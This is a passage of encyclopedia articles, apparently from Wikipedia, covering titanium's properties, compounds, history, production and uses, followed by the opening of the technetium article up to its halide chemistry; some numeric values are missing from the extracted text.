strengths of over 1,400 MPa (200,000 psi). However, titanium loses strength when heated above . Titanium is not as hard as some grades of heat-treated steel; it is non-magnetic and a poor conductor of heat and electricity. Machining requires precautions, because the material can gall unless sharp tools and proper cooling methods are used. Like steel structures, those made from titanium have a fatigue limit that guarantees longevity in some applications. The metal is a dimorphic allotrope of a hexagonal close packed α form that changes into a body-centered cubic (lattice) β form at . The specific heat of the α form increases dramatically as it is heated to this transition temperature but then falls and remains fairly constant for the β form regardless of temperature. Chemical properties Like aluminium and magnesium, the surface of titanium metal and its alloys oxidize immediately upon exposure to air to form a thin non-porous passivation layer that protects the bulk metal from further oxidation or corrosion. When it first forms, this protective layer is only 1–2 nm thick but it continues to grow slowly, reaching a thickness of 25 nm in four years. This layer gives titanium excellent resistance to corrosion against oxidizing acids, but it will dissolve in dilute hydrofluoric acid, hot hydrochloric acid, and hot sulfuric acid. Titanium is capable of withstanding attack by dilute sulfuric and hydrochloric acids at room temperature, chloride solutions, and most organic acids. However, titanium is corroded by concentrated acids. Titanium is a very reactive metal that burns in normal air at lower temperatures than the melting point. Melting is possible only in an inert atmosphere or vacuum. At , it combines with chlorine. It also reacts with the other halogens and absorbs hydrogen. Titanium readily reacts with oxygen at in air, and at in pure oxygen, forming titanium dioxide. Titanium is one of the few elements that burns in pure nitrogen gas, reacting at to form titanium nitride, which causes embrittlement. Because of its high reactivity with oxygen, nitrogen, and many other gases, titanium that is evaporated from filaments is the basis for titanium sublimation pumps, in which titanium serves as a scavenger for these gases by chemically binding to them. Such pumps inexpensively produce extremely low pressures in ultra-high vacuum systems. Occurrence Titanium is the ninth-most abundant element in Earth's crust (0.63% by mass) and the seventh-most abundant metal. It is present as oxides in most igneous rocks, in sediments derived from them, in living things, and natural bodies of water. Of the 801 types of igneous rocks analyzed by the United States Geological Survey, 784 contained titanium. Its proportion in soils is approximately 0.5–1.5%. Common titanium-containing minerals are anatase, brookite, ilmenite, perovskite, rutile, and titanite (sphene). Akaogiite is an extremely rare mineral consisting of titanium dioxide. Of these minerals, only rutile and ilmenite have economic importance, yet even they are difficult to find in high concentrations. About 6.0 and 0.7 million tonnes of those minerals were mined in 2011, respectively. Significant titanium-bearing ilmenite deposits exist in Australia, Canada, China, India, Mozambique, New Zealand, Norway, Sierra Leone, South Africa, and Ukraine. About 210,000 tonnes of titanium metal sponge were produced in 2020, mostly in China (110,000 t), Japan (50,000 t), Russia (33,000 t) and Kazakhstan (15,000 t). Total reserves of anatase, ilmenite, and rutile are estimated to exceed 2 billion tonnes. The concentration of titanium is about 4 picomolar in the ocean. At 100 °C, the concentration of titanium in water is estimated to be less than 10−7 M at pH 7. The identity of titanium species in aqueous solution remains unknown because of its low solubility and the lack of sensitive spectroscopic methods, although only the 4+ oxidation state is stable in air. No evidence exists for a biological role, although rare organisms are known to accumulate high concentrations of titanium. Titanium is contained in meteorites, and it has been detected in the Sun and in M-type stars (the coolest type) with a surface temperature of . Rocks brought back from the Moon during the Apollo 17 mission are composed of 12.1% TiO2. Native titanium (pure metallic) is very rare. Isotopes Naturally occurring titanium is composed of five stable isotopes: 46Ti, 47Ti, 48Ti, 49Ti, and 50Ti, with 48Ti being the most abundant (73.8% natural abundance). At least 21 radioisotopes have been characterized, the most stable of which are 44Ti with a half-life of 63 years; 45Ti, 184.8 minutes; 51Ti, 5.76 minutes; and 52Ti, 1.7 minutes. All other radioactive isotopes have half-lives less than 33 seconds, with the majority less than half a second. The isotopes of titanium range in atomic weight from (39Ti) to (64Ti). The primary decay mode for isotopes lighter than 46Ti is positron emission (with the exception of 44Ti which undergoes electron capture), leading to isotopes of scandium, and the primary mode for isotopes heavier than 50Ti is beta emission, leading to isotopes of vanadium. Titanium becomes radioactive upon bombardment with deuterons, emitting mainly positrons and hard gamma rays. Compounds The +4 oxidation state dominates titanium chemistry, but compounds in the +3 oxidation state are also numerous. Commonly, titanium adopts an octahedral coordination geometry in its complexes, but tetrahedral TiCl4 is a notable exception. Because of its high oxidation state, titanium(IV) compounds exhibit a high degree of covalent bonding. Oxides, sulfides, and alkoxides The most important oxide is TiO2, which exists in three important polymorphs; anatase, brookite, and rutile. All three are white diamagnetic solids, although mineral samples can appear dark (see rutile). They adopt polymeric structures in which Ti is surrounded by six oxide ligands that link to other Ti centers. The term titanates usually refers to titanium(IV) compounds, as represented by barium titanate (BaTiO3). With a perovskite structure, this material exhibits piezoelectric properties and is used as a transducer in the interconversion of sound and electricity. Many minerals are titanates, such as ilmenite (FeTiO3). Star sapphires and rubies get their asterism (star-forming shine) from the presence of titanium dioxide impurities. A variety of reduced oxides (suboxides) of titanium are known, mainly reduced stoichiometries of titanium dioxide obtained by atmospheric plasma spraying. Ti3O5, described as a Ti(IV)-Ti(III) species, is a purple semiconductor produced by reduction of TiO2 with hydrogen at high temperatures, and is used industrially when surfaces need to be vapor-coated with titanium dioxide: it evaporates as pure TiO, whereas TiO2 evaporates as a mixture of oxides and deposits coatings with variable refractive index. Also known is Ti2O3, with the corundum structure, and TiO, with the rock salt structure, although often nonstoichiometric. The alkoxides of titanium(IV), prepared by treating TiCl4 with alcohols, are colorless compounds that convert to the dioxide on reaction with water. They are industrially useful for depositing solid TiO2 via the sol-gel process. Titanium isopropoxide is used in the synthesis of chiral organic compounds via the Sharpless epoxidation. Titanium forms a variety of sulfides, but only TiS2 has attracted significant interest. It adopts a layered structure and was used as a cathode in the development of lithium batteries. Because Ti(IV) is a "hard cation", the sulfides of titanium are unstable and tend to hydrolyze to the oxide with release of hydrogen sulfide. Nitrides and carbides Titanium nitride (TiN) is a refractory solid exhibiting extreme hardness, thermal/electrical conductivity, and a high melting point. TiN has a hardness equivalent to sapphire and carborundum (9.0 on the Mohs scale), and is often used to coat cutting tools, such as drill bits. It is also used as a gold-colored decorative finish and as a barrier layer in semiconductor fabrication. Titanium carbide (TiC), which is also very hard, is found in cutting tools and coatings. Halides Titanium tetrachloride (titanium(IV) chloride, TiCl4) is a colorless volatile liquid (commercial samples are yellowish) that, in air, hydrolyzes with spectacular emission of white clouds. Via the Kroll process, TiCl4 is used in the conversion of titanium ores to titanium metal. Titanium tetrachloride is also used to make titanium dioxide, e.g., for use in white paint. It is widely used in organic chemistry as a Lewis acid, for example in the Mukaiyama aldol condensation. In the van Arkel–de Boer process, titanium tetraiodide (TiI4) is generated in the production of high purity titanium metal. Titanium(III) and titanium(II) also form stable chlorides. A notable example is titanium(III) chloride (TiCl3), which is used as a catalyst for production of polyolefins (see Ziegler–Natta catalyst) and a reducing agent in organic chemistry. Organometallic complexes Owing to the important role of titanium compounds as polymerization catalyst, compounds with Ti-C bonds have been intensively studied. The most common organotitanium complex is titanocene dichloride ((C5H5)2TiCl2). Related compounds include Tebbe's reagent and Petasis reagent. Titanium forms carbonyl complexes, e.g. (C5H5)2Ti(CO)2. Anticancer therapy studies Following the success of platinum-based chemotherapy, titanium(IV) complexes were among the first non-platinum compounds to be tested for cancer treatment. The advantage of titanium compounds lies in their high efficacy and low toxicity in vivo. In biological environments, hydrolysis leads to the safe and inert titanium dioxide. Despite these advantages the first candidate compounds failed clinical trials due to insufficient efficacy to toxicity ratios and formulation complications. Further development resulted in the creation of potentially effective, selective, and stable titanium-based drugs. History Titanium was discovered in 1791 by the clergyman and geologist William Gregor as an inclusion of a mineral in Cornwall, Great Britain. Gregor recognized the presence of a new element in ilmenite when he found black sand by a stream and noticed the sand was attracted by a magnet. Analyzing the sand, he determined the presence of two metal oxides: iron oxide (explaining the attraction to the magnet) and 45.25% of a white metallic oxide he could not identify. Realizing that the unidentified oxide contained a metal that did not match any known element, in 1791 Gregor reported his findings in both German and French science journals: Crell's Annalen and Observations et Mémoires sur la Physique. He named this oxide manaccanite. Around the same time, Franz-Joseph Müller von Reichenstein produced a similar substance, but could not identify it. The oxide was independently rediscovered in 1795 by Prussian chemist Martin Heinrich Klaproth in rutile from Boinik (the German name of Bajmócska), a village in Hungary (now Bojničky in Slovakia). Klaproth found that it contained a new element and named it for the Titans of Greek mythology. After hearing about Gregor's earlier discovery, he obtained a sample of manaccanite and confirmed that it contained titanium. The currently known processes for extracting titanium from its various ores are laborious and costly; it is not possible to reduce the ore by heating with carbon (as in iron smelting) because titanium combines with the carbon to produce titanium carbide. An extraction of 95% pure titanium was achieved by Lars Fredrik Nilson and Otto Petterson. To achieve this they chlorinated titanium oxide in a carbon monoxide atmosphere with chlorine gas before reducing it to titanium metal by the use of sodium. Pure metallic titanium (99.9%) was first prepared in 1910 by Matthew A. Hunter at Rensselaer Polytechnic Institute by heating TiCl4 with sodium at under great pressure in a batch process known as the Hunter process. Titanium metal was not used outside the laboratory until 1932 when William Justin Kroll produced it by reducing titanium tetrachloride (TiCl4) with calcium. Eight years later he refined this process with magnesium and with sodium in what became known as the Kroll process. Although research continues to seek cheaper and more efficient routes, such as the FFC Cambridge process, the Kroll process is still predominantly used for commercial production. Titanium of very high purity was made in small quantities when Anton Eduard van Arkel and Jan Hendrik de Boer discovered the iodide process in 1925, by reacting with iodine and decomposing the formed vapors over a hot filament to pure metal. In the 1950s and 1960s, the Soviet Union pioneered the use of titanium in military and submarine applications (Alfa class and Mike class) as part of programs related to the Cold War. Starting in the early 1950s, titanium came into use extensively in military aviation, particularly in high-performance jets, starting with aircraft such as the F-100 Super Sabre and Lockheed A-12 and SR-71. Throughout the Cold War period, titanium was considered a strategic material by the U.S. government, and a large stockpile of titanium sponge (a porous form of the pure metal) was maintained by the Defense National Stockpile Center, until the stockpile was dispersed in the 2000s. As of 2021, the four leading producers of titanium sponge were China (52%), Japan (24%), Russia (16%) and Kazakhstan (7%). Production Mineral beneficiation processes The Becher process is an industrial process used to produce synthetic rutile, a form of titanium dioxide, from the ore ilmenite. The Chloride process. The Sulfate process: "relies on sulfuric acid (H2SO4) to leach titanium from ilmenite ore (FeTiO3). The resulting reaction produces titanyl sulfate (TiOSO4). A secondary hydrolysis stage is used to break the titanyl sulfate into hydrated TiO2 and H2SO4. Finally, heat is used to remove the water and create the end product - pure TiO2." Purification processes Hunter process The Hunter process was the first industrial process to produce pure metallic titanium. It was invented in 1910 by Matthew A. Hunter, a chemist born in New Zealand who worked in the United States. The process involves reducing titanium tetrachloride (TiCl4) with sodium (Na) in a batch reactor with an inert atmosphere at a temperature of 1,000 °C. Dilute hydrochloric acid is then used to leach the salt from the product. TiCl4(g) + 4 Na(l) → 4 NaCl(l) + Ti(s) Kroll process The processing of titanium metal occurs in four major steps: reduction of titanium ore into "sponge", a porous form; melting of sponge, or sponge plus a master alloy to form an ingot; primary fabrication, where an ingot is converted into general mill products such as billet, bar, plate, sheet, strip, and tube; and secondary fabrication of finished shapes from mill products. Because it cannot be readily produced by reduction of titanium dioxide, titanium metal is obtained by reduction of titanium tetrachloride (TiCl4) with magnesium metal in the Kroll process. The complexity of this batch production in the Kroll process explains the relatively high market value of titanium, despite the Kroll process being less expensive than the Hunter process. To produce the TiCl4 required by the Kroll process, the dioxide is subjected to carbothermic reduction in the presence of chlorine. In this process, the chlorine gas is passed over a red-hot mixture of rutile or ilmenite in the presence of carbon. After extensive purification by fractional distillation, the TiCl4 is reduced with molten magnesium in an argon atmosphere. 2FeTiO3 + 7Cl2 + 6C ->[900^oC] 2FeCl3 + 2TiCl4 + 6CO TiCl4 + 2Mg ->[1100^oC] Ti + 2MgCl2 Arkel-Boer process The van Arkel–de Boer process was the first semi-industrial process for pure Titanium. It involves thermal decomposition of titanium tetraiodide. Armstrong process Titanium powder is manufactured using a flow production process known as the Armstrong process that is similar to the batch production Hunter process. A stream of titanium tetrachloride gas is added to a stream of molten sodium; the products (sodium chloride salt and titanium particles) is filtered from the extra sodium. Titanium is then separated from the salt by water washing. Both sodium and chlorine are recycled to produce and process more titanium tetrachloride. Pilot plants Methods for electrolytic production of Ti metal from using molten salt electrolytes have been researched and tested at laboratory and small pilot plant scales. The lead author of an impartial review published in 2017 considered his own process "ready for scaling up." A 2023 review "discusses the electrochemical principles involved in the recovery of metals from aqueous solutions and fused salt electrolytes", with particular attention paid to titanium. While some metals such as nickel and copper can be refined by electrowinning at room temperature, titanium must be in the molten state and "there is a strong chance of attack of the refractory lining by molten titanium." Zhang et al concluded their Perspective on Thermochemical and Electrochemical Processes for Titanium Metal Production in 2017 that "Even though there are strong interests in the industry for finding a better method to produce Ti metal, and a large number of new concepts and improvements have been investigated at the laboratory or even at pilot plant scales, there is no new process to date that can replace the Kroll process commercially." The Hydrogen assisted magnesiothermic reduction (HAMR) process uses titanium dihydride. Fabrication All welding of titanium must be done in an inert atmosphere of argon or helium to shield it from contamination with atmospheric gases (oxygen, nitrogen, and hydrogen). Contamination causes a variety of conditions, such as embrittlement, which reduce the integrity of the assembly welds and lead to joint failure. Titanium is very difficult to solder directly, and hence a solderable metal or alloy such as steel is coated on titanium prior to soldering. Titanium metal can be machined with the same equipment and the same processes as stainless steel. Titanium alloys Common titanium alloys are made by reduction. For example, cuprotitanium (rutile with copper added), ferrocarbon titanium (ilmenite reduced with coke in an electric furnace), and manganotitanium (rutile with manganese or manganese oxides) are reduced. About fifty grades of titanium alloys are designed and currently used, although only a couple of dozen are readily available commercially. The ASTM International recognizes 31 grades of titanium metal and alloys, of which grades one through four are commercially pure (unalloyed). Those four vary in tensile strength as a function of oxygen content, with grade 1 being the most ductile (lowest tensile strength with an oxygen content of 0.18%), and grade 4 the least ductile (highest tensile strength with an oxygen content of 0.40%). The remaining grades are alloys, each designed for specific properties of ductility, strength, hardness, electrical resistivity, creep resistance, specific corrosion resistance, and combinations thereof. In addition to the ASTM specifications, titanium alloys are also produced to meet aerospace and military specifications (SAE-AMS, MIL-T), ISO standards, and country-specific specifications, as well as proprietary end-user specifications for aerospace, military, medical, and industrial applications. Forming and forging Commercially pure flat product (sheet, plate) can be formed readily, but processing must take into account of the tendency of the metal to springback. This is especially true of certain high-strength alloys. Exposure to the oxygen in air at the elevated temperatures used in forging results in formation of a brittle oxygen-rich metallic surface layer called "alpha case" that worsens the fatigue properties, so it must be removed by milling, etching, or electrochemical treatment. The working of titanium is very complicated, and may include Friction welding, cryo-forging, and Vacuum arc remelting. Applications Titanium is used in steel as an alloying element (ferro-titanium) to reduce grain size and as a deoxidizer, and in stainless steel to reduce carbon content. Titanium is often alloyed with aluminium (to refine grain size), vanadium, copper (to harden), iron, manganese, molybdenum, and other metals. Titanium mill products (sheet, plate, bar, wire, forgings, castings) find application in industrial, aerospace, recreational, and emerging markets. Powdered titanium is used in pyrotechnics as a source of bright-burning particles. Pigments, additives, and coatings About 95% of all titanium ore is destined for refinement into titanium dioxide (), an intensely white permanent pigment used in paints, paper, toothpaste, and plastics. It is also used in cement, in gemstones, and as an optical opacifier in paper. pigment is chemically inert, resists fading in sunlight, and is very opaque: it imparts a pure and brilliant white color to the brown or grey chemicals that form the majority of household plastics. In nature, this compound is found in the minerals anatase, brookite, and rutile. Paint made with titanium dioxide does well in severe temperatures and marine environments. Pure titanium dioxide has a very high index of refraction and an optical dispersion higher than diamond. Titanium dioxide is used in sunscreens because it reflects and absorbs UV light. Aerospace and marine Because titanium alloys have high tensile strength to density ratio, high corrosion resistance, fatigue resistance, high crack resistance, and ability to withstand moderately high temperatures without creeping, they are used in aircraft, armor plating, naval ships, spacecraft, and missiles. For these applications, titanium is alloyed with aluminium, zirconium, nickel, vanadium, and other elements to manufacture a variety of components including critical structural parts, landing gear, firewalls, exhaust ducts (helicopters), and hydraulic systems. In fact, about two thirds of all titanium metal produced is used in aircraft engines and frames. The titanium 6AL-4V alloy accounts for almost 50% of all alloys used in aircraft applications. The Lockheed A-12 and the SR-71 "Blackbird" were two of the first aircraft frames where titanium was used, paving the way for much wider use in modern military and commercial aircraft. A large amount of titanium mill products are used in the production of many aircraft, such as (following values are amount of raw mill products used, only a fraction of this ends up in the finished aircraft): 116 metric tons are used in the Boeing 787, 77 in the Airbus A380, 59 in the Boeing 777, 45 in the Boeing 747, 32 in the Airbus A340, 18 in the Boeing 737, 18 in the Airbus A330, and 12 in the Airbus A320. In aero engine applications, titanium is used for rotors, compressor blades, hydraulic system components, and nacelles. An early use in jet engines was for the Orenda Iroquois in the 1950s. Because titanium is resistant to corrosion by sea water, it is used to make propeller shafts, rigging, heat exchangers in desalination plants, heater-chillers for salt water aquariums, fishing line and leader, and divers' knives. Titanium is used in the housings and components of ocean-deployed surveillance and monitoring devices for science and military. The former Soviet Union developed techniques for making submarines with hulls of titanium alloys, forging titanium in huge vacuum tubes. Industrial Welded titanium pipe and process equipment (heat exchangers, tanks, process vessels, valves) are used in the chemical and petrochemical industries primarily for corrosion resistance. Specific alloys are used in oil and gas downhole applications and nickel hydrometallurgy for their high strength (e. g.: titanium beta C alloy), corrosion resistance, or both. The pulp and paper industry uses titanium in process equipment exposed to corrosive media, such as sodium hypochlorite or wet chlorine gas (in the bleachery). Other applications include ultrasonic welding, wave soldering, and sputtering targets. Titanium tetrachloride (TiCl4), a colorless liquid, is important as an intermediate in the process of making TiO2 and is also used to produce the Ziegler–Natta catalyst. Titanium tetrachloride is also used to iridize glass and, because it fumes strongly in moist air, it is used to make smoke screens. Consumer and architectural Titanium metal is used in automotive applications, particularly in automobile and motorcycle racing where low weight and high strength and rigidity are critical. The metal is generally too expensive for the general consumer market, though some late model Corvettes have been manufactured with titanium exhausts, and a Corvette Z06's LT4 supercharged engine uses lightweight, solid titanium intake valves for greater strength and resistance to heat. Titanium is used in many sporting goods: tennis rackets, golf clubs, lacrosse stick shafts; cricket, hockey, lacrosse, and football helmet grills, and bicycle frames and components. Although not a mainstream material for bicycle production, titanium bikes have been used by racing teams and adventure cyclists. Titanium alloys are used in spectacle frames that are rather expensive but highly durable, long lasting, light weight, and cause no skin allergies. Titanium is a common material for backpacking cookware and eating utensils. Though more expensive than traditional steel or aluminium alternatives, titanium products can be significantly lighter without compromising strength. Titanium horseshoes are preferred to steel by farriers because they are lighter and more durable. Titanium has occasionally been used in architecture. The Monument to Yuri Gagarin, the first man to travel in space (), as well as the Monument to the Conquerors of Space on top of the Cosmonaut Museum in Moscow are made of titanium for the metal's attractive color and association with rocketry. The Guggenheim Museum Bilbao and the Cerritos Millennium Library were the first buildings in Europe and North America, respectively, to be sheathed in titanium panels. Titanium sheathing was used in the Frederic C. Hamilton Building in Denver, Colorado. Because of titanium's superior strength and light weight relative to other metals (steel, stainless steel, and aluminium), and because of recent advances in metalworking techniques, its use has become more widespread in the manufacture of firearms. Primary uses include pistol frames and revolver cylinders. For the same reasons, it is used in the body of some laptop computers (for example, in Apple's PowerBook G4). In 2023, Apple launched the iPhone 15 Pro, which uses a titanium enclosure. Some upmarket lightweight and corrosion-resistant tools, such as shovels, knife handles and flashlights, are made of titanium or titanium alloys. Jewelry Because of its durability, titanium has become more popular for designer jewelry (particularly, titanium rings). Its inertness makes it a good choice for those with allergies or those who will be wearing the jewelry in environments such as swimming pools. Titanium is also alloyed with gold to produce an alloy that can be marketed as 24-karat gold because the 1% of alloyed Ti is insufficient to require a lesser mark. The resulting alloy is roughly the hardness of 14-karat gold and is more durable than pure 24-karat gold. Titanium's durability, light weight, and dent and corrosion resistance make it useful for watch cases. Some artists work with titanium to produce sculptures, decorative objects and furniture. Titanium may be anodized to vary the thickness of the surface oxide layer, causing optical interference fringes and a variety of bright colors. With this coloration and chemical inertness, titanium is a popular metal for body piercing. Titanium has a minor use in dedicated non-circulating coins and medals. In 1999, Gibraltar released the world's first titanium coin for the millennium celebration. The Gold Coast Titans, an Australian rugby league team, award a medal of pure titanium to their player of the year. Medical Because titanium is biocompatible (non-toxic and not rejected by the body), it has many medical uses, including surgical implements and implants, such as hip balls and sockets (joint replacement) and dental implants that can stay in place for up to 20 years. The titanium is often alloyed with about 4% aluminium or 6% Al and 4% vanadium. Titanium has the inherent ability to osseointegrate, enabling use in dental implants that can last for over 30 years. This property is also useful for orthopedic implant applications. These benefit from titanium's lower modulus of elasticity (Young's modulus) to more closely match that of the bone that such devices are intended to repair. As a result, skeletal loads are more evenly shared between bone and implant, leading to a lower incidence of bone degradation due to stress shielding and periprosthetic bone fractures, which occur at the boundaries of orthopedic implants. However, titanium alloys' stiffness is still more than twice that of bone, so adjacent bone bears a greatly reduced load and may deteriorate. Because titanium is non-ferromagnetic, patients with titanium implants can be safely examined with magnetic resonance imaging (convenient for long-term implants). Preparing titanium for implantation in the body involves subjecting it to a high-temperature plasma arc which removes the surface atoms, exposing fresh titanium that is instantly oxidized. Modern advancements in additive manufacturing techniques have increased potential for titanium use in orthopedic implant applications. Complex implant scaffold designs can be 3D-printed using titanium alloys, which allows for more patient-specific applications and increased implant osseointegration. Titanium is used for the surgical instruments used in image-guided surgery, as well as wheelchairs, crutches, and any other products where high strength and low weight are desirable. Titanium dioxide nanoparticles are widely used in electronics and the delivery of pharmaceuticals and cosmetics. Nuclear waste storage Because of its corrosion resistance, containers made of titanium have been studied for the long-term storage of nuclear waste. Containers lasting more than 100,000 years are thought possible with manufacturing conditions that minimize material defects. A titanium "drip shield" could also be installed over containers of other types to enhance their longevity. Precautions Titanium is non-toxic even in large doses and does not play any natural role inside the human body. An estimated quantity of 0.8 milligrams of titanium is ingested by humans each day, but most passes through without being absorbed in the tissues. It does, however, sometimes bio-accumulate in tissues that contain silica. One study indicates a possible connection between titanium and yellow nail syndrome. As a powder or in the form of metal shavings, titanium metal poses a significant fire hazard and, when heated in air, an explosion hazard. Water and carbon dioxide are ineffective for extinguishing a titanium fire; Class D dry powder agents must be used instead. When used in the production or handling of chlorine, titanium should not be exposed to dry chlorine gas because it may result in a titanium–chlorine fire. Titanium can catch fire when a fresh, non-oxidized surface comes in contact with liquid oxygen. Function in plants An unknown mechanism in plants may use titanium to stimulate the production of carbohydrates and encourage growth. This may explain why most plants contain about 1 part per million (ppm) of titanium, food plants have about 2 ppm, and horsetail and nettle contain up to 80 ppm.
Physical sciences
Chemical elements_2
null
30041
https://en.wikipedia.org/wiki/Technetium
Technetium
Technetium is a chemical element; it has symbol Tc and atomic number 43. It is the lightest element whose isotopes are all radioactive. Technetium and promethium are the only radioactive elements whose neighbours in the sense of atomic number are both stable. All available technetium is produced as a synthetic element. Naturally occurring technetium is a spontaneous fission product in uranium ore and thorium ore (the most common source), or the product of neutron capture in molybdenum ores. This silvery gray, crystalline transition metal lies between manganese and rhenium in group 7 of the periodic table, and its chemical properties are intermediate between those of both adjacent elements. The most common naturally occurring isotope is 99Tc, in traces only. Many of technetium's properties had been predicted by Dmitri Mendeleev before it was discovered; Mendeleev noted a gap in his periodic table and gave the undiscovered element the provisional name ekamanganese (Em). In 1937, technetium became the first predominantly artificial element to be produced, hence its name (from the Greek , 'artificial', + One short-lived gamma ray–emitting nuclear isomer, technetium-99m, is used in nuclear medicine for a wide variety of tests, such as bone cancer diagnoses. The ground state of the nuclide technetium-99 is used as a gamma ray–free source of beta particles. Long-lived technetium isotopes produced commercially are byproducts of the fission of uranium-235 in nuclear reactors and are extracted from nuclear fuel rods. Because even the longest-lived isotope of technetium has a relatively short half-life (4.21 million years), the 1952 detection of technetium in red giants helped to prove that stars can produce heavier elements. History Early assumptions From the 1860s through 1871, early forms of the periodic table proposed by Dmitri Mendeleev contained a gap between molybdenum (element 42) and ruthenium (element 44). In 1871, Mendeleev predicted this missing element would occupy the empty place below manganese and have similar chemical properties. Mendeleev gave it the provisional name eka-manganese (from eka, the Sanskrit word for one) because it was one place down from the known element manganese. Early misidentifications Many early researchers, both before and after the periodic table was published, were eager to be the first to discover and name the missing element. Its location in the table suggested that it should be easier to find than other undiscovered elements. This turned out not to be the case, due to technetium's radioactivity. Irreproducible results German chemists Walter Noddack, Otto Berg, and Ida Tacke reported the discovery of element 75 and element 43 in 1925, and named element 43 masurium (after Masuria in eastern Prussia, now in Poland, the region where Walter Noddack's family originated). This name caused significant resentment in the scientific community, because it was interpreted as referring to a series of victories of the German army over the Russian army in the Masuria region during World War I; as the Noddacks remained in their academic positions while the Nazis were in power, suspicions and hostility against their claim for discovering element 43 continued. The group bombarded columbite with a beam of electrons and deduced element 43 was present by examining X-ray emission spectrograms. The wavelength of the X-rays produced is related to the atomic number by a formula derived by Henry Moseley in 1913. The team claimed to detect a faint X-ray signal at a wavelength produced by element 43. Later experimenters could not replicate the discovery, and it was dismissed as an error. Still, in 1933, a series of articles on the discovery of elements quoted the name masurium for element 43. Some more recent attempts have been made to rehabilitate the Noddacks' claims, but they are disproved by Paul Kuroda's study on the amount of technetium that could have been present in the ores they studied: it could not have exceeded of ore, and thus would have been undetectable by the Noddacks' methods. Official discovery and later history The discovery of element 43 was finally confirmed in a 1937 experiment at the University of Palermo in Sicily by Carlo Perrier and Emilio Segrè. In mid-1936, Segrè visited the United States, first Columbia University in New York and then the Lawrence Berkeley National Laboratory in California. He persuaded cyclotron inventor Ernest Lawrence to let him take back some discarded cyclotron parts that had become radioactive. Lawrence mailed him a molybdenum foil that had been part of the deflector in the cyclotron. Segrè enlisted his colleague Perrier to attempt to prove, through comparative chemistry, that the molybdenum activity was indeed from an element with the atomic number 43. In 1937, they succeeded in isolating the isotopes technetium-95m and technetium-97. University of Palermo officials wanted them to name their discovery , after the Latin name for Palermo, . In 1947, element 43 was named after the Greek word (), meaning 'artificial', since it was the first element to be artificially produced. Segrè returned to Berkeley and met Glenn T. Seaborg. They isolated the metastable isotope technetium-99m, which is now used in some ten million medical diagnostic procedures annually. In 1952, the astronomer Paul W. Merrill in California detected the spectral signature of technetium (specifically wavelengths of 403.1 nm, 423.8 nm, 426.2 nm, and 429.7 nm) in light from S-type red giants. The stars were near the end of their lives but were rich in the short-lived element, which indicated that it was being produced in the stars by nuclear reactions. That evidence bolstered the hypothesis that heavier elements are the product of nucleosynthesis in stars. More recently, such observations provided evidence that elements are formed by neutron capture in the s-process. Since that discovery, there have been many searches in terrestrial materials for natural sources of technetium. In 1962, technetium-99 was isolated and identified in pitchblende from the Belgian Congo in very small quantities (about 0.2 ng/kg), where it originates as a spontaneous fission product of uranium-238. The natural nuclear fission reactor in Oklo contains evidence that significant amounts of technetium-99 were produced and have since decayed into ruthenium-99. Characteristics Physical properties Technetium is a silvery-gray radioactive metal with an appearance similar to platinum, commonly obtained as a gray powder. The crystal structure of the bulk pure metal is hexagonal close-packed, and crystal structures of the nanodisperse pure metal are cubic. Nanodisperse technetium does not have a split NMR spectrum, while hexagonal bulk technetium has the Tc-99-NMR spectrum split in 9 satellites. Atomic technetium has characteristic emission lines at wavelengths of 363.3 nm, 403.1 nm, 426.2 nm, 429.7 nm, and 485.3 nm. The unit cell parameters of the orthorhombic Tc metal were reported when Tc is contaminated with carbon ( = 0.2805(4), = 0.4958(8), = 0.4474(5)·nm for Tc-C with 1.38 wt% C and = 0.2815(4), = 0.4963(8), = 0.4482(5)·nm for Tc-C with 1.96 wt% C ). The metal form is slightly paramagnetic, meaning its magnetic dipoles align with external magnetic fields, but will assume random orientations once the field is removed. Pure, metallic, single-crystal technetium becomes a type-II superconductor at temperatures below . Below this temperature, technetium has a very high magnetic penetration depth, greater than any other element except niobium. Chemical properties Technetium is located in the group 7 of the periodic table, between rhenium and manganese. As predicted by the periodic law, its chemical properties are between those two elements. Of the two, technetium more closely resembles rhenium, particularly in its chemical inertness and tendency to form covalent bonds. This is consistent with the tendency of period 5 elements to resemble their counterparts in period 6 more than period 4 due to the lanthanide contraction. Unlike manganese, technetium does not readily form cations (ions with net positive charge). Technetium exhibits nine oxidation states from −1 to +7, with +4, +5, and +7 being the most common. Technetium dissolves in aqua regia, nitric acid, and concentrated sulfuric acid, but not in hydrochloric acid of any concentration. Metallic technetium slowly tarnishes in moist air and, in powder form, burns in oxygen. When reacting with hydrogen at high pressure, it forms the hydride TcH and while reacting with carbon it forms TcC, with cell parameter 0.398 nm, as well as the nanodisperce low-carbon-content carbide with parameter 0.402nm. Technetium can catalyse the destruction of hydrazine by nitric acid, and this property is due to its multiplicity of valencies. This caused a problem in the separation of plutonium from uranium in nuclear fuel processing, where hydrazine is used as a protective reductant to keep plutonium in the trivalent rather than the more stable tetravalent state. The problem was exacerbated by the mutually enhanced solvent extraction of technetium and zirconium at the previous stage, and required a process modification. Compounds Pertechnetate and other derivatives The most prevalent form of technetium that is easily accessible is sodium pertechnetate, Na[TcO4]. The majority of this material is produced by radioactive decay from [99MoO4]2−: Pertechnetate () is only weakly hydrated in aqueous solutions, and it behaves analogously to perchlorate anion, both of which are tetrahedral. Unlike permanganate (), it is only a weak oxidizing agent. Related to pertechnetate is technetium heptoxide. This pale-yellow, volatile solid is produced by oxidation of Tc metal and related precursors: It is a molecular metal oxide, analogous to manganese heptoxide. It adopts a centrosymmetric structure with two types of Tc−O bonds with 167 and 184 pm bond lengths. Technetium heptoxide hydrolyzes to pertechnetate and pertechnetic acid, depending on the pH: HTcO4 is a strong acid. In concentrated sulfuric acid, [TcO4]− converts to the octahedral form TcO3(OH)(H2O)2, the conjugate base of the hypothetical triaquo complex [TcO3(H2O)3]+. Other chalcogenide derivatives Technetium forms a dioxide, disulfide, diselenide, and ditelluride. An ill-defined Tc2S7 forms upon treating pertechnate with hydrogen sulfide. It thermally decomposes into disulfide and elemental sulfur. Similarly the dioxide can be produced by reduction of the Tc2O7. Unlike the case for rhenium, a trioxide has not been isolated for technetium. However, TcO3 has been identified in the gas phase using mass spectrometry. Simple hydride and halide complexes Technetium forms the complex . The potassium salt is isostructural with . At high pressure formation of TcH1.3 from elements was also reported. The following binary (containing only two elements) technetium halides are known: TcF6, TcF5, TcCl4, TcBr4, TcBr3, α-TcCl3, β-TcCl3, TcI3, α-TcCl2, and β-TcCl2. The oxidation states range from Tc(VI) to Tc(II). Technetium halides exhibit different structure types, such as molecular octahedral complexes, extended chains, layered sheets, and metal clusters arranged in a three-dimensional network. These compounds are produced by combining the metal and halogen or by less direct reactions. TcCl4 is obtained by chlorination of Tc metal or 